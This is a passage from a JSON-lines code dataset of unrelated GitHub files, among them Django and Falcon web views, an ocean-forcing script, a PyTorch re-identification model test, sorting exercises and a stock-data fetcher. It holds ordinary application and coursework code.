UserInRoom(APIView):\n def get(self, request, format=None):\n # check and create session for user if it does not already exist\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n\n # if user has already joined a room in this session, return the code of that room\n data = {\n 'code': self.request.session.get('room_code')\n }\n\n return JsonResponse(data, status=status.HTTP_200_OK)\n\n# leave a room\nclass LeaveRoom(APIView):\n def post(self, request, format=None):\n if 'room_code' in self.request.session:\n # remove room from session\n self.request.session.pop('room_code')\n # if the user who left the room is also the host, delete the room\n host_id = self.request.session.session_key\n room_results = Room.objects.filter(host=host_id)\n if len(room_results) > 0:\n room = room_results[0]\n room.delete()\n return Response({'message':'Success'}, status=status.HTTP_200_OK)\n\nclass UpdateRoom(APIView):\n serializer_class = UpdateRoomSerializer\n\n def patch(self, request, format=None):\n # check and create session for current user if it does not already exist\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n\n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n # extract the data\n guest_can_pause = serializer.data.get('guest_can_pause')\n votes_to_skip = serializer.data.get('votes_to_skip')\n code = serializer.data.get('code')\n\n queryset = Room.objects.filter(code=code)\n\n # check whether room exists\n if not queryset.exists():\n return Response({'msg':'Room not found'}, status=status.HTTP_404_NOT_FOUND)\n\n room = queryset[0]\n user_id = self.request.session.session_key\n\n # only allow host to update room settings\n if room.host != user_id:\n return Response({'msg':'Only the host can update room settings'}, status=status.HTTP_403_FORBIDDEN)\n \n # update the room and respond with 'OK'\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n return Response(RoomSerializer(room).data, status=status.HTTP_200_OK)\n\n return Response({'Bad Request':'Invalid data'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"vykhy/spotify-django","sub_path":"music_controller/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42352515817","text":"\"\"\"\nThis makes the atm forcing files for an analytical run.\n\nDesigned to run only as backfill.\n\nTesting:\n\nrun make_forcing_main.py -g ae0 -r backfill -d 2020.01.01 -f atmA0 -test True\n\n\"\"\"\n\nfrom pathlib import Path\nimport sys\nfrom datetime import datetime, timedelta\n\nfrom lo_tools import forcing_argfun2 as ffun\n\nLdir = ffun.intro() # this handles all the argument passing\nresult_dict = dict()\nresult_dict['start_dt'] = datetime.now()\n\n# ****************** CASE-SPECIFIC CODE *****************\n\nimport xarray as xr\nfrom time import time\nimport numpy as np\nfrom lo_tools import Lfun, zfun, zrfun\n\nif Ldir['testing']:\n from importlib import reload\n reload(zrfun)\n\n# This directory is created, along with Info and Data subdirectories, by ffun.intro()\nout_dir = Ldir['LOo'] / 'forcing' / Ldir['gridname'] / ('f' + Ldir['date_string']) / Ldir['frc']\n\n# get grid and S info, and some sizes\nG = zrfun.get_basic_info(Ldir['grid'] / 'grid.nc', only_G=True)\nNR = G['M']; NC = G['L']\n\n# Make the time vector. Here I just have two time points, at the start\n# and end of the day, but you could have more, e.g. hourly. You would still\n# want the total time to just be one day.\ndt0 = datetime.strptime(Ldir['date_string'], Lfun.ds_fmt)\ndt1 = dt0 + timedelta(days=1)\not_vec = np.array([Lfun.datetime_to_modtime(dt0), Lfun.datetime_to_modtime(dt1)])\nNT = len(ot_vec)\n\n# Create fields for the state variables.\nvn_list = ['Pair','rain','swrad','lwrad_down','Tair','Qair','Uwind','Vwind']\n\n# For now we just fill everything with zeros and nan's\nomat = np.zeros((NT, NR, NC))\n# mr2 = np.ones((NT, NR, NC)) * G['mask_rho'].reshape((1, NR, NC))\n# omat[mr2==0] = np.nan\n# NOTE: I when we tried masking for atm fields ROMS did not like it.\n\nfor vn in vn_list:\n out_fn = out_dir / (vn + '.nc')\n out_fn.unlink(missing_ok=True)\n ds = xr.Dataset()\n vinfo = zrfun.get_varinfo(vn)\n tname = vinfo['time_name']\n dims = (tname,) + vinfo['space_dims_tup']\n # You could intervene here by writing something different than omat.\n ds[vn] = (dims, omat.copy())\n ds[vn].attrs['units'] = vinfo['units']\n ds[vn].attrs['long_name'] = vinfo['long_name']\n # time coordinate\n ds[tname] = ((tname,), ot_vec)\n ds[tname].attrs['units'] = Lfun.roms_time_units\n ds[tname].attrs['long_name'] = 'ocean time'\n # and save to NetCDF\n Enc_dict = {vn:zrfun.enc_dict for vn in ds.data_vars}\n ds.to_netcdf(out_fn, encoding=Enc_dict)\n ds.close()\n\ndef print_info(fn):\n print('\\n' + str(fn))\n ds = xr.open_dataset(fn)#, decode_times=False)\n print(ds)\n ds.close()\n\n# Check results\nnc_list = [item + '.nc' for item in vn_list]\nif Ldir['testing']:\n # print info about the files to the screen\n for fn in nc_list:\n print_info(out_dir / fn)\nresult_dict['result'] = 'success'\nfor fn in nc_list:\n if (out_dir / fn).is_file():\n pass\n else:\n result_dict['result'] = 'fail'\n\n# *******************************************************\n\nresult_dict['end_dt'] = datetime.now()\nffun.finale(Ldir, result_dict)\n","repo_name":"parkermac/LO","sub_path":"forcing/atmA0/make_forcing_main.py","file_name":"make_forcing_main.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"22332293127","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n # path(\"/\", views.index, name='', name='index'),\n path('CollectionDash/', views.CollectionDash, name='CollectionDash'),\n\n path('DispatchForm1/', views.DispatchForm1, name='DispatchForm1'),\n\n path('CollectionDashDetails/', views.CollectionDashDetails, name='CollectionDashDetails'),\n\n path('DispatchForm2/', views.DispatchForm2, name='DispatchForm2'),\n\n path('DispatchForm3/', views.DispatchForm3, name='DispatchForm3'),\n\n path('HomePage/', views.HomePage, name='HomePage'),\n\n path('InwardChoices/', views.InwardChoices, name='InwardChoices'),\n\n path('InwardForm1/', views.InwardForm1, name='InwardForm1'),\n\n path('InwardForm2/', views.InwardForm2, name='InwardForm2'),\n\n path('', views.Login, name='Login'),\n\n path('Outwardchoices/', views.Outwardchoices, name='Outwardchoices'),\n\n path('RegisterVendorPage2/', views.RegisterVendorPage2, name='RegisterVendorPage2'),\n\n path('RegisterVendorSuccess/', views.RegisterVendorSuccess, name='RegisterVendorSuccess'),\n\n path('RegistorVendorForm1/', views.RegistorVendorForm1, name='RegistorVendorForm1'),\n\n path('SignUp/', views.SignUp, name='SignUp'),\n\n path('SuccessDispatch/', views.SuccessDispatch, name='SuccessDispatch'),\n\n path('SuccessInward/', views.SuccessInward, name='SuccessInward'),\n\n path('SuccessOutward/', views.SuccessOutward, name='SuccessOutward'),\n\n path('Admin_Dashboard/', views.Admin_Dashboard, name='Admin_Dashboard'),\n\n path('SavedDrafts/', views.SavedDrafts, name='SavedDrafts'),\n\n path('ProfilePage/', views.ProfilePage, name='ProfilePage'),\n\n path('Login2/', views.Login2, name='Login2'),\n\n path('SignUp2/', views.SignUp2, name='SignUp2'),\n\n path('DispatchForm4/', views.DispatchForm4, name='DispatchForm4'),\n\n path('PurchaseOrders/', views.PurchaseOrders, name='PurchaseOrders'),\n\n path('CollectionDash/ajax/objects.txt',views.ajax, name='ajax'),\n\n path('CollectionDashDetails/ajax/objects.txt',views.ajax, name='ajax'),\n\n\n]","repo_name":"dhruvv7772/ReCircle_B2B","sub_path":"testsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30188483862","text":"import sys\n_module = sys.modules[__name__]\ndel sys\ndata = _module\nloss = _module\nmain = _module\nnetwork = _module\nopt = _module\nRandomErasing = _module\nRandomSampler = _module\nTripletLoss = _module\nextract_feature = _module\nget_optimizer = _module\nmetrics = _module\ntransform_cuhk03 = _module\n\nfrom _paritybench_helpers import _mock_config, patch_functional\nfrom unittest.mock import mock_open, MagicMock\nfrom torch.autograd import Function\nfrom torch.nn import Module\nimport abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings\nimport numpy as np\nfrom torch import Tensor\npatch_functional()\nopen = mock_open()\nyaml = logging = sys = argparse = MagicMock()\nArgumentParser = argparse.ArgumentParser\n_global_config = args = argv = cfg = config = params = _mock_config()\nargparse.ArgumentParser.return_value.parse_args.return_value = _global_config\nyaml.load.return_value = _global_config\nsys.argv = _global_config\n__version__ = '1.0.0'\nxrange = range\nwraps = functools.wraps\n\n\nfrom torchvision import transforms\n\n\nfrom torch.utils.data import dataset\n\n\nfrom torch.utils.data import dataloader\n\n\nfrom torchvision.datasets.folder import default_loader\n\n\nimport re\n\n\nfrom torch.nn import CrossEntropyLoss\n\n\nfrom torch.nn.modules import loss\n\n\nimport numpy as np\n\n\nfrom scipy.spatial.distance import cdist\n\n\nimport matplotlib\n\n\nimport matplotlib.pyplot as plt\n\n\nimport torch\n\n\nfrom torch.optim import lr_scheduler\n\n\nimport copy\n\n\nimport torch.nn as nn\n\n\nfrom torchvision.models.resnet import resnet50\n\n\nfrom torchvision.models.resnet import Bottleneck\n\n\nimport random\n\n\nimport collections\n\n\nfrom torch.utils.data import sampler\n\n\nfrom torch.optim import Adam\n\n\nfrom torch.optim import SGD\n\n\nclass TripletLoss(nn.Module):\n \"\"\"Triplet loss with hard positive/negative mining.\n Reference:\n Hermans et al. In Defense of the Triplet Loss for Person Re-Identification. arXiv:1703.07737.\n Code imported from https://github.com/Cysu/open-reid/blob/master/reid/loss/triplet.py.\n Args:\n margin (float): margin for triplet.\n \"\"\"\n\n def __init__(self, margin=0.3, mutual_flag=False):\n super(TripletLoss, self).__init__()\n self.margin = margin\n self.ranking_loss = nn.MarginRankingLoss(margin=margin)\n self.mutual = mutual_flag\n\n def forward(self, inputs, targets):\n \"\"\"\n Args:\n inputs: feature matrix with shape (batch_size, feat_dim)\n targets: ground truth labels with shape (num_classes)\n \"\"\"\n n = inputs.size(0)\n dist = torch.pow(inputs, 2).sum(dim=1, keepdim=True).expand(n, n)\n dist = dist + dist.t()\n dist.addmm_(1, -2, inputs, inputs.t())\n dist = dist.clamp(min=1e-12).sqrt()\n mask = targets.expand(n, n).eq(targets.expand(n, n).t())\n dist_ap, dist_an = [], []\n for i in range(n):\n dist_ap.append(dist[i][mask[i]].max().unsqueeze(0))\n dist_an.append(dist[i][mask[i] == 0].min().unsqueeze(0))\n dist_ap = torch.cat(dist_ap)\n dist_an = torch.cat(dist_an)\n y = torch.ones_like(dist_an)\n loss = self.ranking_loss(dist_an, dist_ap, y)\n if self.mutual:\n return loss, dist\n return loss\n\n\nclass Loss(loss._Loss):\n\n def __init__(self):\n super(Loss, self).__init__()\n\n def forward(self, outputs, labels):\n cross_entropy_loss = CrossEntropyLoss()\n triplet_loss = TripletLoss(margin=1.2)\n Triplet_Loss = [triplet_loss(output, labels) for output in outputs[1:4]]\n Triplet_Loss = sum(Triplet_Loss) / len(Triplet_Loss)\n CrossEntropy_Loss = [cross_entropy_loss(output, labels) for output in outputs[4:]]\n CrossEntropy_Loss = sum(CrossEntropy_Loss) / len(CrossEntropy_Loss)\n loss_sum = Triplet_Loss + 2 * CrossEntropy_Loss\n None\n return loss_sum\n\n\nnum_classes = 751\n\n\nclass MGN(nn.Module):\n\n def __init__(self):\n super(MGN, self).__init__()\n feats = 256\n resnet = resnet50(pretrained=True)\n self.backbone = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1, resnet.layer2, resnet.layer3[0])\n res_conv4 = nn.Sequential(*resnet.layer3[1:])\n res_g_conv5 = resnet.layer4\n res_p_conv5 = nn.Sequential(Bottleneck(1024, 512, downsample=nn.Sequential(nn.Conv2d(1024, 2048, 1, bias=False), nn.BatchNorm2d(2048))), Bottleneck(2048, 512), Bottleneck(2048, 512))\n res_p_conv5.load_state_dict(resnet.layer4.state_dict())\n self.p1 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_g_conv5))\n self.p2 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n self.p3 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n self.maxpool_zg_p1 = nn.MaxPool2d(kernel_size=(12, 4))\n self.maxpool_zg_p2 = nn.MaxPool2d(kernel_size=(24, 8))\n self.maxpool_zg_p3 = nn.MaxPool2d(kernel_size=(24, 8))\n self.maxpool_zp2 = nn.MaxPool2d(kernel_size=(12, 8))\n self.maxpool_zp3 = nn.MaxPool2d(kernel_size=(8, 8))\n self.reduction = nn.Sequential(nn.Conv2d(2048, feats, 1, bias=False), nn.BatchNorm2d(feats), nn.ReLU())\n self._init_reduction(self.reduction)\n self.fc_id_2048_0 = nn.Linear(feats, num_classes)\n self.fc_id_2048_1 = nn.Linear(feats, num_classes)\n self.fc_id_2048_2 = nn.Linear(feats, num_classes)\n self.fc_id_256_1_0 = nn.Linear(feats, num_classes)\n self.fc_id_256_1_1 = nn.Linear(feats, num_classes)\n self.fc_id_256_2_0 = nn.Linear(feats, num_classes)\n self.fc_id_256_2_1 = nn.Linear(feats, num_classes)\n self.fc_id_256_2_2 = nn.Linear(feats, num_classes)\n self._init_fc(self.fc_id_2048_0)\n self._init_fc(self.fc_id_2048_1)\n self._init_fc(self.fc_id_2048_2)\n self._init_fc(self.fc_id_256_1_0)\n self._init_fc(self.fc_id_256_1_1)\n self._init_fc(self.fc_id_256_2_0)\n self._init_fc(self.fc_id_256_2_1)\n self._init_fc(self.fc_id_256_2_2)\n\n @staticmethod\n def _init_reduction(reduction):\n nn.init.kaiming_normal_(reduction[0].weight, mode='fan_in')\n nn.init.normal_(reduction[1].weight, mean=1.0, std=0.02)\n nn.init.constant_(reduction[1].bias, 0.0)\n\n @staticmethod\n def _init_fc(fc):\n nn.init.kaiming_normal_(fc.weight, mode='fan_out')\n nn.init.constant_(fc.bias, 0.0)\n\n def forward(self, x):\n x = self.backbone(x)\n p1 = self.p1(x)\n p2 = self.p2(x)\n p3 = self.p3(x)\n zg_p1 = self.maxpool_zg_p1(p1)\n zg_p2 = self.maxpool_zg_p2(p2)\n zg_p3 = self.maxpool_zg_p3(p3)\n zp2 = self.maxpool_zp2(p2)\n z0_p2 = zp2[:, :, 0:1, :]\n z1_p2 = zp2[:, :, 1:2, :]\n zp3 = self.maxpool_zp3(p3)\n z0_p3 = zp3[:, :, 0:1, :]\n z1_p3 = zp3[:, :, 1:2, :]\n z2_p3 = zp3[:, :, 2:3, :]\n fg_p1 = self.reduction(zg_p1).squeeze(dim=3).squeeze(dim=2)\n fg_p2 = self.reduction(zg_p2).squeeze(dim=3).squeeze(dim=2)\n fg_p3 = self.reduction(zg_p3).squeeze(dim=3).squeeze(dim=2)\n f0_p2 = self.reduction(z0_p2).squeeze(dim=3).squeeze(dim=2)\n f1_p2 = self.reduction(z1_p2).squeeze(dim=3).squeeze(dim=2)\n f0_p3 = self.reduction(z0_p3).squeeze(dim=3).squeeze(dim=2)\n f1_p3 = self.reduction(z1_p3).squeeze(dim=3).squeeze(dim=2)\n f2_p3 = self.reduction(z2_p3).squeeze(dim=3).squeeze(dim=2)\n l_p1 = self.fc_id_2048_0(fg_p1)\n l_p2 = self.fc_id_2048_1(fg_p2)\n l_p3 = self.fc_id_2048_2(fg_p3)\n l0_p2 = self.fc_id_256_1_0(f0_p2)\n l1_p2 = self.fc_id_256_1_1(f1_p2)\n l0_p3 = self.fc_id_256_2_0(f0_p3)\n l1_p3 = self.fc_id_256_2_1(f1_p3)\n l2_p3 = self.fc_id_256_2_2(f2_p3)\n predict = torch.cat([fg_p1, fg_p2, fg_p3, f0_p2, f1_p2, f0_p3, f1_p3, f2_p3], dim=1)\n return predict, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3\n\n\nimport torch\nfrom torch.nn import MSELoss, ReLU\nfrom _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile\n\n\nTESTCASES = [\n # (nn.Module, init_args, forward_args, jit_compiles)\n (TripletLoss,\n lambda: ([], {}),\n lambda: ([torch.rand([4, 4]), torch.rand([4, 4])], {}),\n False),\n]\n\nclass Test_GNAYUOHZ_ReID_MGN(_paritybench_base):\n def test_000(self):\n self._check(*TESTCASES[0])\n\n","repo_name":"eladhoffer/pytorch-jit-paritybench","sub_path":"generated/test_GNAYUOHZ_ReID_MGN.py","file_name":"test_GNAYUOHZ_ReID_MGN.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"25895596158","text":"from django.shortcuts import render\nfrom django.http import StreamingHttpResponse, HttpResponse\nfrom django.http.response import HttpResponseServerError\nfrom django.views.decorators import gzip\nfrom tiny_yolo import tiny_yolo_gen\nfrom user.views import check_cookie\nimport multiprocessing\nimport queue\nimport threading\n\nimport time\nimport json\nimport cv2\nimport tensorflow\nimport os\nimport json\n\nQRespList = {}\nQNameList = {}\nq_resp = multiprocessing.Queue()\nq_name = multiprocessing.Queue()\n\nclass ReadFromAnotherProcess(threading.Thread): \n def __init__(self, QRespList, QNameList):\n super().__init__()\n self.QRespList = QRespList\n self.QNameList = QNameList\n\n def run(self):\n while True:\n if not q_resp.empty():\n res = q_resp.get()\n for i in self.QRespList:\n self.QRespList[i].put(res)\n while not q_name.empty():\n name = q_name.get()\n if name == 'Unknown':\n continue\n for i in self.QNameList:\n self.QNameList[i].append(name)\n time.sleep(0.02)\n\np = multiprocessing.Process(target=tiny_yolo_gen, args=(q_resp, q_name))\np.start()\nth_rfap = ReadFromAnotherProcess(QRespList, QNameList)\nth_rfap.start()\n\ndef fetch(username):\n while True:\n if not QRespList[username].empty():\n res = QRespList[username].get()\n try:\n yield res\n except:\n del QRespList[username]\n del QNameList[username]\n break\n\ndef get_black_name(request):\n status = check_cookie(request)\n if status[0] == -1:\n return render(request, 'redirect.html', {'message': 'Unauthorized.', 'url': '/login'})\n username = status[1]\n global QNameList\n namelist = list(set(QNameList[username]))\n QNameList[username] = []\n resp = {'name': namelist}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n@gzip.gzip_page\ndef video_feed(request):\n status = check_cookie(request)\n if status[0] == -1:\n return render(request, 'redirect.html', {'message': 'Unauthorized.', 'url': '/login'})\n username = status[1]\n if username in QRespList:\n return render(request, 'redirect.html', {'message': 'Current user is right now watching, please use another account.', 'url': '/'})\n QNameList[username] = []\n QRespList[username] = queue.Queue()\n try:\n return StreamingHttpResponse(fetch(username),content_type=\"multipart/x-mixed-replace;boundary=frame\")\n except:\n print('aborted')\n\ndef monitor(request):\n status = check_cookie(request)\n if status[0] == -1:\n return render(request, 'redirect.html', {'message': 'Unauthorized.', 'url': '/login'})\n username = status[1]\n if username in QRespList:\n return render(request, 'redirect.html', {'message': 'Current user is right now watching, please use another account.', 'url': '/'})\n return render(request, 'monitor.html', {'username': username})\n","repo_name":"zh-ding/IntelligentMonitoringSystem","sub_path":"monitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"39611924986","text":"#Corey Henry & natalie morrision #Date Assigned: 24Feb14\n# #\n#Course CSE 1384 Sec 06 #Date Due: 03Mar14\n#File name: Lab \n#\n#Program description- \n\nimport random\nimport time\n\n##function that will take the two numbers in a list side by side and determine which is smaller\n#then will put the smallest infront\n\ndef bubbleSort(aList):\n n = len(aList)\n for each in range(n):\n index =0\n for each in range(n-1):\n \n # determines which number is smaller and puts it first, then moves up one index\n \n if aList[index] > aList[index+1]:\n var1 = aList[index]\n var2 = aList[index+1]\n aList[index] = var2\n aList[index+1] = var1\n index +=1\n\n \n else:\n index +=1\n return\n\n\n\n \n# function that will sort by checking the whole list for the lowest value\n#and placing it first, then continuing on and on. help from interactivepython.org\ndef selectionSort(aList):\n for each in range(len(aList)-1,0,-1):\n mini = 0\n for index in range(1,each+1):\n if aList[index] > aList[mini]:\n mini = index\n var1 = aList[each]\n aList[each] = aList[mini]\n aList[mini] = var1\n\n \n \n\ndef main():\n #Create a list of 1000 random numbers\n myList = []\n\n for i in range(10000):\n x = random.randint(1, 25)\n myList.append(x)\n\n\n #Sort using python sort method\n start = time.time()\n myList.sort()\n stop = time.time()\n total_time = stop - start\n #print(\"Sorted:\", myList)\n\n print(\"Time needed for python sort method: \", total_time)\n\n #Recreate an unordered list\n for i in range(len(myList)):\n myList[i] = random.randint(1, 25)\n\n #Sort using bubble sort method\n start = time.time()\n bubbleSort(myList)\n stop = time.time()\n total_time = stop - start\n #print(\"Sorted:\", myList)\n\n print(\"Time needed for bubble sort function: \", total_time)\n\n\n #Recreate an unordered list\n for i in range(len(myList)):\n myList[i] = random.randint(1, 25)\n\n #Sort using selection sort method\n start = time.time()\n selectionSort(myList)\n stop = time.time()\n total_time = stop - start\n\n\n #print(\"Sorted:\", myList)\n\n print(\"Time needed for selection sort function: \", total_time)\n\n\n input(\"\\nPress Enter to close\")\n\nmain()\n","repo_name":"cah835/Intermediate-Programming-1384","sub_path":"Lab 6/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28306210163","text":"def count_3sets(lst):\n counter = 0\n prev_sum = 0\n with open(lst, 'r') as numbers:\n contents = numbers.read()\n num_list = [int(num) for num in contents.split(\"\\n\")]\n for i in range(1, len(num_list)):\n counter += sum(num_list[i : i+3]) > sum(num_list[i-1 : i+2])\n \n print(counter)\n\nfilename = \"numbers.txt\"\ncount_3sets(filename)","repo_name":"JLByrne21/adventofcode","sub_path":"1/day1b.py","file_name":"day1b.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26995383823","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n \"\"\"\n :type preorder: List[int]\n :type inorder: List[int]\n :rtype: TreeNode\n \"\"\"\n if inorder:\n root = TreeNode(preorder.pop(0))\n inPos = inorder.index(root.val)\n # preorder changed while backtracking, so the the following two preorders are different\n root.left = self.buildTree(preorder,inorder[:inPos])\n root.right = self.buildTree(preorder,inorder[inPos+1:])\n return root\n# else no return = None","repo_name":"xidongc/py_leetcode","sub_path":"tree/traversal/construct-tree-in-pre.py","file_name":"construct-tree-in-pre.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"16878912530","text":"import falcon\nimport subprocess\nfrom .configuration import Setting\nfrom general.definition import Definition, CStatus\nfrom .pe_channels import PEChannels\nfrom .messaging_system import MessagingServices, MessagesQueue\n\n\nclass RequestStatus(object):\n def __init__(self):\n pass\n\n def get_machine_status(self):\n \"\"\"\n Get machine status by calling a unix command and fetch for load average\n \"\"\"\n res = str(subprocess.check_output(Definition.get_cpu_load_command())).strip()\n res = res.replace(\",\", \"\").replace(\"\\\\n\", \"\").replace(\"'\", \"\")\n *_, load1, load5, load15 = res.split(\" \")\n return load1, load5, load15\n\n def on_get(self, req, res):\n \"\"\"\n GET: /status?token={None}\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n if req.params[Definition.get_str_token()] == Setting.get_token():\n result = self.get_machine_status()\n res.body = '{ \"' + Definition.get_str_node_name() + '\": \"' + Setting.get_node_name() + '\", \\\n \"' + Definition.get_str_node_role() + '\": \"master\", \\\n \"' + Definition.get_str_node_addr() + '\": \"' + Setting.get_node_addr() + '\", \\\n \"' + Definition.get_str_load1() + '\": ' + result[0] + ', \\\n \"' + Definition.get_str_load5() + '\": ' + result[1] + ', \\\n \"' + Definition.get_str_load15() + '\": ' + result[2] + ' }'\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n else:\n res.body = \"Invalid token ID.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n\n\nclass MessageStreaming(object):\n def __init__(self):\n pass\n\n def on_get(self, req, res):\n \"\"\"\n GET: /streamRequest?token=None\n This function is mainly respond with the available channel for streaming from data source.\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n # Check for the available channel\n channel = PEChannels.get_available_channel(group=\"optimize\")\n if channel:\n # If channel is available\n res.body = Definition.get_channel_response(channel[0], channel[1], MessagingServices.get_new_msg_id())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n else:\n if MessagesQueue.is_queue_available():\n # Channel is not available, respond with messaging system channel\n res.body = Definition.get_channel_response(Setting.get_node_addr(), Setting.get_data_port_start(),\n MessagingServices.get_new_msg_id())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n else:\n # Message in queue is full\n res.body = Definition.get_channel_response(\"0.0.0.0\", 0, 0)\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n\n def on_post(self, req, res):\n \"\"\"\n POST: /streamRequest?token=None\n This function respond with getting a stream from data source or from messaging system.\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n # Check that the PE is existing or not, if not insert and respond\n if Definition.REST.Batch.get_str_batch_addr() in req.params and \\\n Definition.REST.Batch.get_str_batch_port() in req.params and \\\n Definition.REST.Batch.get_str_batch_status() in req.params:\n\n # Check for data type\n if req.params[Definition.REST.Batch.get_str_batch_port()].isdigit() and \\\n req.params[Definition.REST.Batch.get_str_batch_status()].isdigit():\n\n batch_port = int(req.params[Definition.REST.Batch.get_str_batch_port()])\n batch_status = int(req.params[Definition.REST.Batch.get_str_batch_status()])\n print(\"There are {0} messages in queue.\".format(MessagesQueue.get_queue_length()))\n # If queue contain data, ignore update and stream from queue\n if MessagesQueue.get_queue_length() > 0 and batch_status == CStatus.AVAILABLE:\n res.data = bytes(MessagesQueue.pop_queue(0)[0])\n res.content_type = \"Bytes\"\n res.status = falcon.HTTP_203\n else:\n # Register channel\n PEChannels.register_channel(req.params[Definition.REST.Batch.get_str_batch_addr()],\n batch_port, batch_status)\n res.body = \"OK\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n\n else:\n res.body = \"Invalid data type!\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n else:\n res.body = \"Invalid parameters!\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n\n\nclass MessagesQuery(object):\n def __init__(self):\n pass\n\n def on_get(self, req, res):\n \"\"\"\n GET: /messagesQuery?token=None&command=queueLength\n This function inquiry about the number of messages in queue. For dealing with create a new instance.\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n if not Definition.MessagesQueue.get_str_command() in req.params:\n res.body = \"No command specified.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n return\n\n if req.params[Definition.MessagesQueue.get_str_command()] == Definition.MessagesQueue.get_str_queue_length():\n res.body = str(MessagesQueue.get_queue_length())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n return\n\n if req.params[Definition.MessagesQueue.get_str_command()] == Definition.MessagesQueue.get_str_current_id():\n res.body = str(MessagingServices.get_current_id())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n return\n\n if req.params[Definition.MessagesQueue.get_str_command()] == Definition.ChannelStatus.get_str_pe_status():\n res.body = str(PEChannels.view_available_channel())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n return\n\n\nclass RESTService(object):\n def __init__(self):\n # Initialize REST Services\n from wsgiref.simple_server import make_server\n api = falcon.API()\n\n # Add route for getting status update\n api.add_route('/' + Definition.REST.get_str_status(), RequestStatus())\n\n # Add route for stream request\n api.add_route('/' + Definition.REST.get_str_stream_req(), MessageStreaming())\n\n # Add route for msg query\n api.add_route('/' + Definition.REST.get_str_msg_query(), MessagesQuery())\n\n # Establishing a REST server\n self.__server = make_server(Setting.get_node_addr(), Setting.get_node_port(), api)\n\n def run(self):\n print(\"REST Ready.....\\n\\n\")\n self.__server.serve_forever()\n","repo_name":"beirbear/HarmonicIO","sub_path":"master/rest_service.py","file_name":"rest_service.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"4873950940","text":"\"\"\"\n\n刷新指数日线数据\n\n\"\"\"\nimport time\nfrom multiprocessing import Pool\n\nimport pandas as pd\nfrom retry.api import retry_call\n\nfrom ..mongodb import get_db\nfrom ..setting.constants import MAIN_INDEX, MARKET_START, MAX_WORKER\nfrom ..utils import ensure_dtypes\nfrom ..utils.db_utils import to_dict\nfrom ..utils.log_utils import make_logger\nfrom ..websource.wy import fetch_history, get_index_base\n\nlogger = make_logger('网易指数日线')\ndb_name = \"wy_index_daily\"\ncol_dtypes = {\n 'd_cols': ['日期'],\n 's_cols': ['股票代码', '名称'],\n 'i_cols': ['成交量', '成交笔数'],\n}\n\n\ndef find_last_date(collection):\n res = collection.find_one(projection={'日期': 1}, sort=[('日期', -1)])\n return res['日期'] if res else MARKET_START.tz_localize(None)\n\n\ndef create_index(collection):\n collection.create_index([(\"日期\", -1)], 